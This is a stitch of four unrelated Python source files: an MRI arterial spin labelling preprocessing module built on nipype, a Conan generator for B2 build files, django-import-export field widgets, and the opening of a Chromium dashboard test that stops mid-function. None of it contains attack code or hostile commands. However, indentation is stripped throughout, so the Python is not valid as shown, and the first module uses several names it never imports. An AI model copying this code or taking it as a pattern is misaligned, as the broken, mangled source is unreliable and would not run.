from nipype.interfaces.base import BaseInterface, \
BaseInterfaceInputSpec, traits, File, TraitedSpec, Directory
from nipype.utils.filemanip import split_filename
from nipype.interfaces.base import InputMultiPath, OutputMultiPath
from procasl.spm_internals import params_to_affine, spm_affine
from procasl._utils import check_images
fsl.FSLCommand.set_default_output_type('NIFTI')
def _add_prefix(prefix, in_file):
"""Adds a prefix to a filename
Parameters
----------
prefix : str
Prefix to append to the filename
in_file : str
Input file name.
Returns
-------
out_file : str
Output file name
"""
out_file = os.path.join(os.path.dirname(in_file),
prefix + os.path.basename(in_file))
return out_file
def get_scans_number(in_file):
"""Return the number of scans for a 4D image.
Parameters
----------
in_file : str
Input file name.
Returns
-------
int
Number of scans.
"""
image = nibabel.load(in_file)
data = image.get_data()
if data.ndim != 4:
raise ValueError("Expect a 4D image, got a {0}D".format(data.ndim))
return data.shape[-1]
def select_scans(in_file, selected_scans, convert_3d=False, out_file=None):
"""Save selected scan volumes from a 4D image.
Parameters
----------
in_file : str
Path to the 4D image
selected_scans : list of int
Scans to keep.
convert_3d : bool, optional
If True, the image is saved as a 3D nifti image.
out_file : str or None, optional
Path to the extracted image
Returns
-------
out_file : str
Path to the extracted image
"""
image = nibabel.load(in_file)
data = image.get_data()
data = data[..., selected_scans]
if convert_3d:
data = np.squeeze(data, axis=(3,))
image = nibabel.Nifti1Image(data, image.get_affine(), image.get_header())
if out_file is None:
out_file = _add_prefix('subscans_', in_file)
nibabel.save(image, out_file)
return out_file
def save_first_scan(in_file, out_file=None):
"""Save first volume from a 4D image.
Parameters
----------
in_file : str
Path to the 4D image
out_file : str or None, optional
Path to the out image
Returns
-------
out_file : str
Path to the out image
"""
if out_file is None:
out_file = os.path.join(os.path.dirname(in_file),
'first_volume_' + os.path.basename(in_file))
out_file = select_scans(in_file, [0], convert_3d=True,
out_file=out_file)
return out_file
def compute_brain_mask(in_file, frac=0.5):
"""Computes binary brain mask using FSL BET.
Parameters
----------
in_file : str
Path to the 3D image
frac : float, optional
Fractional intensity threshold, smaller values give larger brain
outline estimates.
Returns
-------
str
Path to the brain mask image
"""
btr = fsl.BET()
btr.inputs.in_file = in_file
btr.inputs.frac = frac
btr.inputs.mask = True
res = btr.run()
return res.outputs.mask_file
def apply_mask(in_file, mask_file, mask_value=np.nan, out_file=None):
"""Masks input with a binary mask_file.
Parameters
----------
in_file : str
Path to the 3D image
mask_file : str
Path to the binary mask image
mask_value : float, optional
Value to allocate to masked voxels.
out_file : str or None, optional
Path to the masked image
Returns
-------
out_file : str
Path to the masked image
"""
# Load images
image = nibabel.load(in_file)
data = image.get_data()
mask_image = nibabel.load(mask_file)
mask_data = mask_image.get_data()
# Check shapes and affines
check_images(in_file, mask_file)
# Compute the masked image
data[mask_data == 0] = mask_value
out_image = nibabel.Nifti1Image(data, image.get_affine(),
image.get_header())
if out_file is None:
out_file = _add_prefix('masked_', in_file)
nibabel.save(out_image, out_file)
return out_file
class RescaleInputSpec(BaseInterfaceInputSpec):
in_file = File(
exists=True,
mandatory=True,
copyfile=True,
desc='image filename to rescale')
ss_tr = traits.Float(
mandatory=True,
desc='Single slice repetition time, in ms')
t_i_1 = traits.Float(
mandatory=True,
desc='Bolus length, in ms')
t_i_2 = traits.Float(
mandatory=True,
desc='Inversion time (time from the application of the labeling'
'pulse to image acquisition), in ms')
t1_blood = traits.Float(
1650.,
usedefault=True,
desc='T1 of the blood in ms')
label_efficiency = traits.Float(
.98,
usedefault=True,
desc='labeling efficiency')
class RescaleOutputSpec(TraitedSpec):
rescaled_file = File(exists=True,
desc='The rescaled image file')
class Rescale(BaseInterface):
"""Correct for T1 relaxation between different slices.
PASL images are acquired in EPI single shot with slices from
bottom to up of the brain.
For PASL,
CBF (ml/100g/min) = DeltaM / (2 * M0b * tao * exp(-TI / T1b) * qTI)
and
M0b = Rwm * M0WM * exp((1 / T2wm - 1 / T2b) * TE)
or M0b=Rcsf * M0csf * exp((1 / T2csf-1 / T2b) * TE)
or M0b = MPD / (1 - exp(-TR / T1_tissue)),
TI is the inversion time for different slice;
T1b is the constant relaxation time of arterial blood.
tao is actually TI1 in QUIPPS II
qTI is close to unit, and is set to 0.85 in Warmuth 05. In addition, we
introduce the label efficiency in the calculation.
Rwm - proton density ratio between blood and WM1.06 in Wong 97. 1.19 in
Cavosuglu 09; T2wm and T2b are 55 msec and 100 for 1.5T, 40 and 80 for 3T,
30 and 60 for 4T;
Rcsf - proton density ratio between blood and csf, 0.87 in Cavosuglu,
T2csf is 74.9 ms for 3T.
M0WM means the mean value in an homogenous white matter region, and it
could be selected by drawing an ROI in the M0 image.
T2wm and T2b at 3T were set to 44.7 and 43.6,
T2csf if used was set to 74.9 according to Cavusoglu 09 MRI
Notes
-----
This is a reimplementation of the rescaling method of
correction_scalefactors_philips_2010.m from the GIN toolbox,
courtesy of Jan Warnking.
References
----------
Buxton et al, 1998 MRM 40:383-96.
Warmuth C., Gunther M. and Zimmer G. Radiology, 2003; 228:523-532.
Examples
--------
from procasl import preprocessing
rescale = preprocessing.Rescale
rescale.inputs.in_file = 'raw_asl.nii'
rescale.inputs.ss_tr = 35.
rescale.inputs.t_i_1 = 800.
rescale.inputs.t_i_2 = 1800.
out_rescale = rescale.run()
print(out_rescale.rescaled files)
"""
input_spec = RescaleInputSpec
output_spec = RescaleOutputSpec
def _run_interface(self, runtime):
img = nibabel.load(self.inputs.in_file)
data = img.get_data()
n_slices = data.shape[2]
milli_second = 1000. # 1s in ms
scaling = np.exp((self.inputs.t_i_2 + self.inputs.ss_tr *
np.arange(0, n_slices)) / self.inputs.t1_blood) /\
(2. * self.inputs.label_efficiency *
self.inputs.t_i_1 / milli_second)
scaling = scaling[np.newaxis, np.newaxis, :, np.newaxis]
scaling = np.tile(scaling, (data.shape[0], data.shape[1], 1,
data.shape[-1]))
data = data * scaling
img = nibabel.Nifti1Image(data, img.get_affine(), img.get_header())
out_file = _add_prefix('sc_', self.inputs.in_file)
nibabel.save(img, out_file)
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
fname = self.inputs.in_file
_, base, _ = split_filename(fname)
outputs["rescaled_file"] = os.path.abspath(
'sc_' + base + '.nii')
return outputs
class AverageInputSpec(BaseInterfaceInputSpec):
in_file = File(
exists=True,
mandatory=True,
copyfile=True,
desc='list of images filenames to average')
class AverageOutputSpec(TraitedSpec):
mean_image = File(exists=True,
desc='The average image file')
class Average(BaseInterface):
"""Compute average functional across time, keeping the affine of
first scan.
Notes
-----
This is a reimplementation of the averaging method of
average_2010.m from the GIN toolbox.
"""
input_spec = AverageInputSpec
output_spec = AverageOutputSpec
def _run_interface(self, runtime):
# Compute and save the mean
img = nibabel.load(self.inputs.in_file)
data = img.get_data().mean(axis=-1)
img = nibabel.Nifti1Image(data, img.get_affine(), img.get_header())
fname = self.inputs.in_file
_, base, _ = split_filename(fname)
out_file = os.path.abspath('mean_' + base + '.nii')
nibabel.save(img, out_file)
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
fname = self.inputs.in_file
_, base, _ = split_filename(fname)
outputs["mean_image"] = os.path.abspath(
'mean_' + base + '.nii')
return outputs
class ControlTagRealignInputSpec(BaseInterfaceInputSpec):
in_file = File(
exists=True,
mandatory=True,
copyfile=True,
desc='The filename of the input ASL 4D image.')
paths = InputMultiPath(Directory(exists=True),
desc='Paths to add to matlabpath')
register_to_mean = traits.Bool(
False,
usedefault=True,
desc='Indicate whether realignment is done to the mean image')
correct_tagging = traits.Bool(
True,
usedefault=True,
desc='True/False correct for tagging artifact by zeroing the mean'
' difference between control and tag.')
control_scans = traits.List(
[],
traits.Int(),
desc='control frames numbers')
tag_scans = traits.List(
[],
traits.Int(),
desc='tag frames numbers')
class ControlTagRealignOutputSpec(TraitedSpec):
realigned_files = File(exists=True,
desc='The resliced files')
realignment_parameters = OutputMultiPath(
File(exists=True),
desc='Estimated translation and rotation parameters')
class ControlTagRealign(BaseInterface):
"""Realign ASL scans. Default parameters are those of the GIN
pipeline.
Notes
-----
This is a reimplementation of the realignement method from
myrealign_pasl_2010.m of GIN toolbox.
Examples
--------
from procasl import preprocessing
realign = preprocessing.Realign()
realign.inputs.in_file = 'functional.nii'
realign.inputs.register_to_mean = False
realign.inputs.correct_tagging = True
out_realign = realign.run()
print(out_realign.realigned files, out_realign.realignement_parameters)
"""
input_spec = ControlTagRealignInputSpec
output_spec = ControlTagRealignOutputSpec
def _run_interface(self, runtime):
# Set the realignement options
realign = spm.Realign()
realign.inputs.paths = self.inputs.paths
realign.inputs.in_files = self.inputs.in_file
realign.inputs.register_to_mean = self.inputs.register_to_mean
realign.inputs.quality = 0.9
realign.inputs.fwhm = 5.
realign.inputs.separation = 4 # TODO: understand this parameter
realign.inputs.interp = 2
if self.inputs.correct_tagging:
# Estimate the realignement parameters
realign.inputs.jobtype = 'estimate'
realign.run()
parameters_file = realign.aggregate_outputs().get()[
'realignment_parameters']
rea_parameters = np.loadtxt(parameters_file)
# Correct for tagging: equal means for control and tag scans
n_scans = len(rea_parameters)
if self.inputs.control_scans:
control_scans = self.inputs.control_scans
else:
control_scans = range(0, n_scans, 2)
if self.inputs.tag_scans:
tag_scans = self.inputs.tag_scans
else:
tag_scans = range(1, n_scans, 2)
gap = np.mean(rea_parameters[control_scans], axis=0) -\
np.mean(rea_parameters[tag_scans], axis=0)
rea_parameters[control_scans] -= gap / 2.
rea_parameters[tag_scans] += gap / 2.
# Save the corrected realignement parameters
np.savetxt(parameters_file, rea_parameters, delimiter=' ')
# Save the corrected transforms for each frame in spm compatible
# .mat. This .mat serves as header for spm in case of 4D files
affine = spm_affine(self.inputs.in_file)
rea_affines = np.zeros((4, 4, n_scans))
for n_scan, param in enumerate(rea_parameters):
rea_affines[..., n_scan] = params_to_affine(param).dot(affine)
affines_file = os.path.splitext(self.inputs.in_file)[0] + '.mat'
savemat(affines_file, dict(mat=rea_affines))
else:
realign.inputs.jobtype = 'estimate'
realign.inputs.register_to_mean = self.inputs.register_to_mean
realign.run()
# Reslice and save the aligned volumes
realign = spm.Realign()
realign.inputs.paths = self.inputs.paths
realign.inputs.in_files = self.inputs.in_file
realign.inputs.jobtype = 'write'
realign.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
fname = self.inputs.in_file
_, base, _ = split_filename(fname)
outputs["realignment_parameters"] = os.path.abspath(
'rp_' + base + '.txt')
outputs["realigned_files"] = os.path.abspath(
'r' + base + '.nii')
return outputs
class GetFirstScanInputSpec(BaseInterfaceInputSpec):
in_file = File(
exists=True,
mandatory=True,
copyfile=True,
desc='The input 4D ASL image filename')
class GetFirstScanOutputSpec(TraitedSpec):
m0_file = File(
exists=True,
desc='The first scan image filename')
class GetFirstScan(BaseInterface):
"""Save the first scan from 4D image (M0).
"""
input_spec = GetFirstScanInputSpec
output_spec = GetFirstScanOutputSpec
def _run_interface(self, runtime):
# Save first scan
image = nibabel.load(self.inputs.in_file)
data = image.get_data()
data = data[..., 0]
image = nibabel.Nifti1Image(data, image.get_affine(),
image.get_header())
_, base, _ = split_filename(self.inputs.in_file)
out_file = os.path.abspath('m0_' + base + '.nii')
nibabel.save(image, out_file)
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
fname = self.inputs.in_file
_, base, _ = split_filename(fname)
outputs["m0_file"] = os.path.abspath('m0_' + base + '.nii')
return outputs
class RemoveFirstScanInputSpec(BaseInterfaceInputSpec):
in_file = File(
exists=True,
mandatory=True,
copyfile=True,
desc='The input 4D ASL image filename')
class RemoveFirstScanOutputSpec(TraitedSpec):
tag_ctl_file = File(
exists=True,
desc='The tag/control sequence image filename')
class RemoveFirstScanControl(BaseInterface):
"""Save the tag/control sequence of a 4D ASL image (removes first scan).
"""
input_spec = RemoveFirstScanInputSpec
output_spec = RemoveFirstScanOutputSpec
def _run_interface(self, runtime):
# Remove first scan
image = nibabel.load(self.inputs.in_file)
data = image.get_data()
data = data[..., 1:]
image = nibabel.Nifti1Image(data, image.get_affine(),
image.get_header())
_, base, _ = split_filename(self.inputs.in_file)
out_file = os.path.abspath('tag_ctl_' + base + '.nii')
nibabel.save(image, out_file)
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
fname = self.inputs.in_file
_, base, _ = split_filename(fname)
outputs["tag_ctl_file"] = os.path.abspath('tag_ctl_' + base + '.nii')
return outputs
|
|
"""
B2 Conan Generator
This is a generator for conanbuildinfo.jam files declaring all conan dependencies
as B2 project and library targets. This generates multiple tagged build info
source files, each containing a single variant as specified by the user's
conan install profile in addition to the central generic one that includes
all possible variants.
"""
from hashlib import md5
from conans.model import Generator
class B2Generator(Generator):
_b2_variation_key = None
_b2_variation_id = None
@property
def filename(self):
pass # in this case, filename defined in return value of content method
@property
def content(self):
"""
Generates two content files: conanbuildinfo.jam and conanbuildinfo-ID.jam which
the former defines sub-projects for each package and loads the other files and
the latter define variables and targets for the packages.
"""
result = {
'conanbuildinfo.jam': None,
self.conanbuildinfo_variation_jam: None
}
# Generate the common conanbuildinfo.jam which does four things:
# 1. Defines some common utility functions to make the rest of the code short.
# 2. Includes the conanbuildinfo-*.jam sub-files for constant declarations.
# 3. Defines all the package sub-projects.
# 4. Includes the conanbuildinfo-*.jam sub-files again, this time for declaring targets.
cbi = [self.conanbuildinfo_header_text]
# The prefix that does 1 & 2.
cbi += [self.conanbuildinfo_prefix_text]
# The sub-project definitions, i.e. 3.
for dep_name, dep_cpp_info in self.deps_build_info.dependencies:
cbi += self.b2_project_for_dep(dep_name, dep_cpp_info)
# The postfix which does 4.
cbi += [self.conanbuildinfo_postfix_text]
# The combined text.
result['conanbuildinfo.jam'] = "\n".join(cbi)
# Generate the current build variation conanbuildinfo-/variation/.jam which does two things:
# 1. Defines project constants for the corresponding conan buildinfo variables.
# 2. Declares targets, with b2 requirements to select the variation, for each
# library in a package and one "libs" target for the collection of all the libraries
# in the package.
cbiv = [self.conanbuildinfo_header_text]
# The first, 1, set of variables are collective in that they have the info for all
# of the packages combined, 1a.
cbiv += ["# global"]
cbiv += self.b2_constants_for_dep('conan', self.deps_build_info)
# Now the constants for individual packages, 1b.
for dep_name, dep_cpp_info in self.deps_build_info.dependencies:
cbiv += ["# %s" % (dep_name.lower())]
cbiv += self.b2_constants_for_dep(
dep_name, dep_cpp_info, self.deps_user_info[dep_name])
# Second, 2, part are the targets for the packages.
for dep_name, dep_cpp_info in self.deps_build_info.dependencies:
cbiv += ["# %s" % (dep_name.lower())]
cbiv += self.b2_targets_for_dep(dep_name, dep_cpp_info)
result[self.conanbuildinfo_variation_jam] = "\n".join(cbiv)
return result
def b2_project_for_dep(self, name, info):
"""
Generates a sub-project definition to match the package. Which is used later
to define targets for the package libs.
"""
if info is None:
return []
name = name.lower()
# Create a b2 project for the package dependency.
return [self.conanbuildinfo_project_template.format(name=name)]
def b2_constants_for_dep(self, name, info, user=None):
"""
Generates a list of constant variable definitions for the information in the
CppInfo conan data given for the package. If user variables map is also given
those are also generated following the package variables.
"""
if info is None:
return []
name = name.lower()
# Define the info specific variables. Note that the 'usage-requirements' one
# needs to be last as it references the others.
# TODO: Should be cppflags -> cxxflags
result = \
self.b2_constant(name, 'rootpath', [info.rootpath], True) + \
self.b2_constant(name, 'includedirs', info.include_paths, True) + \
self.b2_constant(name, 'libdirs', info.lib_paths, True) + \
self.b2_constant(name, 'defines', info.defines) + \
self.b2_constant(name, 'cppflags', info.cxxflags) + \
self.b2_constant(name, 'cflags', info.cflags) + \
self.b2_constant(name, 'sharedlinkflags', info.sharedlinkflags) + \
self.b2_constant(name, 'exelinkflags', info.exelinkflags) + \
self.b2_constant(name, 'requirements', self.b2_features(self.b2_variation)) + \
self.b2_constant(name, 'usage-requirements', [
'<include>$(includedirs({name},{variation}))'.format(name=name, variation=self.b2_variation_id),
'<define>$(defines({name},{variation}))'.format(name=name, variation=self.b2_variation_id),
'<cflags>$(cflags({name},{variation}))'.format(name=name, variation=self.b2_variation_id),
'<cxxflags>$(cppflags({name},{variation}))'.format(name=name, variation=self.b2_variation_id),
'<link>shared:<linkflags>$(sharedlinkflags({name},{variation}))'.format(name=name, variation=self.b2_variation_id)
])
if user:
for uk, uv in user.vars.items():
result += self.b2_constant(uk.lower() + ',' + name, 'user', [uv])
return result
def b2_targets_for_dep(self, name, info):
"""
Generates individual targets for the libraries in a package and a single "libs"
collective alias target that refers to them.
"""
if info is None:
return []
name = name.lower()
result = []
deps = ['/%s//libs' % dep for dep in info.public_deps]
if info.libs:
for lib in info.libs:
result += [self.conanbuildinfo_variation_lib_template.format(
name=name, lib=lib, deps=" ".join(deps), variation=self.b2_variation_id)]
deps.extend(info.libs)
result += [self.conanbuildinfo_variation_alias_template.format(
name=name, libs=" ".join(deps), variation=self.b2_variation_id)]
return result
def b2_constant(self, name, var, val, is_paths=False):
"""
Generates a constant definition for the given variable and value(s). If is_path
is True the value(s) are reformatted to be acceptable to b2.
"""
if not val:
return []
if is_paths:
val = list(self.b2_path(p) for p in val)
value = []
for v in val:
if v.startswith('<'):
value += [' {val}'.format(val=v)]
else:
value += [' "{val}"'.format(val=v)]
return [self.conanbuildinfo_variation_constant_template.format(
name=name, var=var, variation=self.b2_variation_id, value="\n".join(value)
)]
@staticmethod
def b2_path(path):
"""
Adjust a regular path to the form b2 can use in source code.
"""
return path.replace('\\', '/')
@staticmethod
def b2_features(variations):
"""
Generated a b2 requirements list, i.e. <name>value list, from the given 'variations' dict.
"""
result = []
for k, v in sorted(variations.items()):
if v:
result += ['<%s>%s' % (k, v)]
return result
@property
def conanbuildinfo_variation_jam(self):
return 'conanbuildinfo-%s.jam' % self.b2_variation_key
@property
def b2_variation_key(self):
"""
A hashed key of the variation to use a UID for the variation.
"""
if not self._b2_variation_key:
self._b2_variation_key = md5(self.b2_variation_id.encode('utf-8')).hexdigest()
return self._b2_variation_key
@property
def b2_variation_id(self):
"""
A compact single comma separated list of the variation where only the values
of the b2 variation are included in sorted by feature name order.
"""
if not self._b2_variation_id:
vid = []
for k in sorted(self.b2_variation.keys()):
if self.b2_variation[k]:
vid += [self.b2_variation[k]]
self._b2_variation_id = ",".join(vid)
return self._b2_variation_id
@property
def b2_variation(self):
"""
Returns a map of b2 features & values as translated from conan settings that
can affect the link compatibility of libraries.
"""
if not getattr(self, "_b2_variation_key", None):
self._b2_variation = {}
self._b2_variation['toolset'] = self.b2_toolset
self._b2_variation['architecture'] = {
'x86': 'x86', 'x86_64': 'x86',
'ppc64le': 'power', 'ppc64': 'power', 'ppc32': 'power',
'armv5el': 'arm', 'armv5hf': 'arm',
'armv6': 'arm', 'armv7': 'arm', 'armv7hf': 'arm', 'armv7s': 'arm', 'armv7k': 'arm',
'armv8': 'arm', 'armv8_32': 'arm', 'armv8.3': 'arm',
'sparc': 'sparc', 'sparcv9': 'sparc',
'mips': 'mips1', 'mips64': 'mips64',
}.get(self.conanfile.settings.get_safe('arch'))
self._b2_variation['instruction-set'] = {
'armv5el': None, 'armv5hf': None,
'armv6': 'armv6', 'armv7': 'armv7', 'armv7hf': None, 'armv7k': None,
'armv7s': 'armv7s', 'armv8': None, 'armv8_32': None, 'armv8.3': None, 'avr': None,
'mips': None, 'mips64': None,
'ppc64le': None, 'ppc64': 'powerpc64', 'ppc32': None,
'sparc': None, 'sparcv9': 'v9',
'x86': None, 'x86_64': None,
}.get(self.conanfile.settings.get_safe('arch'))
self._b2_variation['address-model'] = {
'x86': '32', 'x86_64': '64',
'ppc64le': '64', 'ppc64': '64', 'ppc32': '32',
'armv5el': '32', 'armv5hf': '32',
'armv6': '32', 'armv7': '32', 'armv7s': '32', 'armv7k': '32', 'armv7hf': '32',
'armv8': '64', 'armv8_32': '32', 'armv8.3': "64",
'sparc': '32', 'sparcv9': '64',
'mips': '32', 'mips64': '64',
}.get(self.conanfile.settings.get_safe('arch'))
self._b2_variation['target-os'] = {
'Windows': 'windows', 'WindowsStore': 'windows', 'WindowsCE': 'windows',
'Linux': 'linux',
'Macos': 'darwin',
'Android': 'android',
'iOS': 'darwin', 'watchOS': 'darwin', 'tvOS': 'darwin',
'FreeBSD': 'freebsd',
'SunOS': 'solaris',
'Arduino': 'linux',
}.get(self.conanfile.settings.get_safe('os'))
self._b2_variation['variant'] = {
'Debug': 'debug',
'Release': 'release',
'RelWithDebInfo': 'relwithdebinfo',
'MinSizeRel': 'minsizerel',
}.get(self.conanfile.settings.get_safe('build_type'))
self._b2_variation['cxxstd'] = {
'98': '98', 'gnu98': '98',
'11': '11', 'gnu11': '11',
'14': '14', 'gnu14': '14',
'17': '17', 'gnu17': '17',
'2a': '2a', 'gnu2a': '2a',
'2b': '2b', 'gnu2b': '2b',
'2c': '2c', 'gnu2c': '2c',
}.get(self.conanfile.settings.get_safe('cppstd'))
self._b2_variation['cxxstd:dialect'] = {
'98': None, 'gnu98': 'gnu',
'11': None, 'gnu11': 'gnu',
'14': None, 'gnu14': 'gnu',
'17': None, 'gnu17': 'gnu',
'2a': None, 'gnu2a': 'gnu',
'2b': None, 'gnu2b': 'gnu',
'2c': None, 'gnu2c': 'gnu',
}.get(self.conanfile.settings.get_safe('cppstd'))
return self._b2_variation
@property
def b2_toolset(self):
compiler = {
'sun-cc': 'sun',
'gcc': 'gcc',
'Visual Studio': 'msvc',
'clang': 'clang',
'apple-clang': 'clang'
}.get(self.conanfile.settings.get_safe('compiler'))
if not compiler:
return
if compiler == 'msvc':
if self.conanfile.settings.compiler.version == '15':
version = '14.1'
else:
version = str(self.conanfile.settings.compiler.version)+'.0'
else:
version = str(self.conanfile.settings.get_safe('compiler.version'))
return compiler + '-' + version
conanbuildinfo_header_text = """\
#|
B2 definitions for Conan packages. This is a generated file.
Edit the corresponding conanfile.txt instead.
|#
"""
conanbuildinfo_prefix_text = """\
import path ;
import project ;
import modules ;
import feature ;
local base-project = [ project.current ] ;
local base-project-mod = [ $(base-project).project-module ] ;
local base-project-location = [ project.attribute $(base-project-mod) location ] ;
rule project-define ( id )
{
id = $(id:L) ;
local saved-project = [ modules.peek project : .base-project ] ;
local id-location = [ path.join $(base-project-location) $(id) ] ;
local id-mod = [ project.load $(id-location) : synthesize ] ;
project.initialize $(id-mod) : $(id-location) ;
project.inherit-attributes $(id-mod) : $(base-project-mod) ;
local attributes = [ project.attributes $(id-mod) ] ;
$(attributes).set parent-module : $(base-project-mod) : exact ;
modules.poke $(base-project-mod) : $(id)-mod : $(id-mod) ;
modules.poke [ CALLER_MODULE ] : $(id)-mod : $(id-mod) ;
modules.poke project : .base-project : $(saved-project) ;
IMPORT $(__name__)
: constant-if call-in-project
: $(id-mod)
: constant-if call-in-project ;
if [ project.is-jamroot-module $(base-project-mod) ]
{
use-project /$(id) : $(id) ;
}
return $(id-mod) ;
}
rule constant-if ( name : value * )
{
if $(__define_constants__) && $(value)
{
call-in-project : constant $(name) : $(value) ;
modules.poke $(__name__) : $(name) : [ modules.peek $(base-project-mod) : $(name) ] ;
}
}
rule call-in-project ( project-mod ? : rule-name args * : * )
{
project-mod ?= $(base-project-mod) ;
project.push-current [ project.target $(project-mod) ] ;
local result = [ modules.call-in $(project-mod) :
$(2) : $(3) : $(4) : $(5) : $(6) : $(7) : $(8) : $(9) : $(10) :
$(11) : $(12) : $(13) : $(14) : $(15) : $(16) : $(17) : $(18) :
$(19) ] ;
project.pop-current ;
return $(result) ;
}
rule include-conanbuildinfo ( cbi )
{
include $(cbi) ;
}
IMPORT $(__name__)
: project-define constant-if call-in-project include-conanbuildinfo
: $(base-project-mod)
: project-define constant-if call-in-project include-conanbuildinfo ;
if ! ( relwithdebinfo in [ feature.values variant ] )
{
variant relwithdebinfo : : <optimization>speed <debug-symbols>on <inlining>full <runtime-debugging>off ;
}
if ! ( minsizerel in [ feature.values variant ] )
{
variant minsizerel : : <optimization>space <debug-symbols>off <inlining>full <runtime-debugging>off ;
}
local __conanbuildinfo__ = [ GLOB $(__file__:D) : conanbuildinfo-*.jam : downcase ] ;
{
local __define_constants__ = yes ;
for local __cbi__ in $(__conanbuildinfo__)
{
call-in-project : include-conanbuildinfo $(__cbi__) ;
}
}
"""
conanbuildinfo_project_template = """\
# {name}
project-define {name} ;
"""
conanbuildinfo_postfix_text = """\
{
local __define_targets__ = yes ;
for local __cbi__ in $(__conanbuildinfo__)
{
call-in-project : include-conanbuildinfo $(__cbi__) ;
}
}
"""
conanbuildinfo_variation_constant_template = """\
constant-if {var}({name},{variation}) :
{value}
;
"""
conanbuildinfo_variation_lib_template = """\
if $(__define_targets__) {{
call-in-project $({name}-mod) : lib {lib}
: {deps}
: <name>{lib} <search>$(libdirs({name},{variation})) $(requirements({name},{variation}))
:
: $(usage-requirements({name},{variation})) ;
call-in-project $({name}-mod) : explicit {lib} ; }}
"""
conanbuildinfo_variation_alias_template = """\
if $(__define_targets__) {{
call-in-project $({name}-mod) : alias libs
: {libs}
: $(requirements({name},{variation}))
:
: $(usage-requirements({name},{variation})) ;
call-in-project $({name}-mod) : explicit libs ; }}
"""
|
|
from __future__ import unicode_literals
from decimal import Decimal
from datetime import datetime
from django.utils import datetime_safe
from django.utils.encoding import smart_text
from django.conf import settings
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
class Widget(object):
"""
Widget takes care of converting between import and export representations.
Widget objects have two functions:
* converts object field value to export representation
* converts import value and converts it to appropriate python
representation
"""
def clean(self, value):
"""
Returns appropriate python objects for import value.
"""
return value
def render(self, value):
"""
Returns export representation of python value.
"""
return force_text(value)
class NumberWidget(Widget):
def render(self, value):
return value
class IntegerWidget(NumberWidget):
"""
Widget for converting integer fields.
"""
def clean(self, value):
if not value and value is not 0:
return None
return int(value)
class DecimalWidget(NumberWidget):
"""
Widget for converting decimal fields.
"""
def clean(self, value):
if not value:
return None
return Decimal(value)
class CharWidget(Widget):
"""
Widget for converting text fields.
"""
def render(self, value):
return force_text(value)
class BooleanWidget(Widget):
"""
Widget for converting boolean fields.
"""
TRUE_VALUES = ["1", 1]
FALSE_VALUE = "0"
def render(self, value):
if value is None:
return ""
return self.TRUE_VALUES[0] if value else self.FALSE_VALUE
def clean(self, value):
if value == "":
return None
return True if value in self.TRUE_VALUES else False
class DateWidget(Widget):
"""
Widget for converting date fields.
Takes optional ``format`` parameter.
"""
def __init__(self, format=None):
if format is None:
if not settings.DATE_INPUT_FORMATS:
formats = ("%Y-%m-%d",)
else:
formats = settings.DATE_INPUT_FORMATS
else:
formats = (format,)
self.formats = formats
def clean(self, value):
if not value:
return None
for format in self.formats:
try:
return datetime.strptime(value, format).date()
except (ValueError, TypeError):
continue
raise ValueError("Enter a valid date.")
def render(self, value):
if not value:
return ""
try:
return value.strftime(self.formats[0])
except:
return datetime_safe.new_date(value).strftime(self.formats[0])
class DateTimeWidget(Widget):
"""
Widget for converting date fields.
Takes optional ``format`` parameter.
"""
def __init__(self, format=None):
if format is None:
if not settings.DATETIME_INPUT_FORMATS:
formats = ("%Y-%m-%d %H:%M:%S",)
else:
formats = settings.DATETIME_INPUT_FORMATS
else:
formats = (format,)
self.formats = formats
def clean(self, value):
if not value:
return None
for format in self.formats:
try:
return datetime.strptime(value, format)
except (ValueError, TypeError):
continue
raise ValueError("Enter a valid date/time.")
def render(self, value):
if not value:
return ""
return value.strftime(self.formats[0])
class ForeignKeyWidget(Widget):
"""
Widget for ``ForeignKey`` which looks up a related model.
The lookup field defaults to using the primary key (``pk``), but
can be customised to use any field on the related model.
e.g. To use a lookup field other than ``pk``, rather than specifying a
field in your Resource as ``class Meta: fields = ('author__name', ...)``,
you would specify it in your Resource like so:
class BookResource(resources.ModelResource):
author = fields.Field(column_name='author', attribute='author', \
widget=ForeignKeyWidget(Author, 'name'))
class Meta: fields = ('author', ...)
This will allow you to use "natural keys" for both import and export.
Parameters:
``model`` should be the Model instance for this ForeignKey (required).
``field`` should be the lookup field on the related model.
"""
def __init__(self, model, field='pk', *args, **kwargs):
self.model = model
self.field = field
super(ForeignKeyWidget, self).__init__(*args, **kwargs)
def clean(self, value):
val = super(ForeignKeyWidget, self).clean(value)
return self.model.objects.get(**{self.field: val}) if val else None
def render(self, value):
if value is None:
return ""
return getattr(value, self.field)
class ManyToManyWidget(Widget):
"""
Widget for ``ManyToManyField`` model field that represent m2m field
as values that identify many-to-many relationship.
Requires a positional argument: the class to which the field is related.
Optional keyword arguments are:
separator - default ","
field - field of related model, default ``pk``
"""
def __init__(self, model, separator=None, field=None, *args, **kwargs):
if separator is None:
separator = ','
if field is None:
field = 'pk'
self.model = model
self.separator = separator
self.field = field
super(ManyToManyWidget, self).__init__(*args, **kwargs)
def clean(self, value):
if not value:
return self.model.objects.none()
ids = value.split(self.separator)
return self.model.objects.filter(**{
'%s__in' % self.field: ids
})
def render(self, value):
ids = [smart_text(getattr(obj, self.field)) for obj in value.all()]
return self.separator.join(ids)
|
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import itertools
import json
import mock
import webapp2
import webtest
from dashboard import pinpoint_request
from dashboard.common import namespaced_stored_object
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import anomaly
from dashboard.models import anomaly_config
from dashboard.models import graph_data
from dashboard.services import pinpoint_service
_DEFAULT_START_COMMIT = 'abcd1234'
_DEFAULT_END_COMMENT = 'efgh5678'
_DEFAULT_TEST_ARGS = ''
_DEFAULT_BUG_ID = 1
_DEFAULT_PIN = ''
_DEFAULT_BISECT_MODE = 'performance'
def GenerateTryRequestParams(params):
if 'start_commit' not in params:
params['start_commit'] = _DEFAULT_START_COMMIT
if 'end_commit' not in params:
params['end_commit'] = _DEFAULT_END_COMMENT
if 'extra_test_args' not in params:
params['extra_test_args'] = _DEFAULT_TEST_ARGS
return params
def GenerateBisectRequestParams(params):
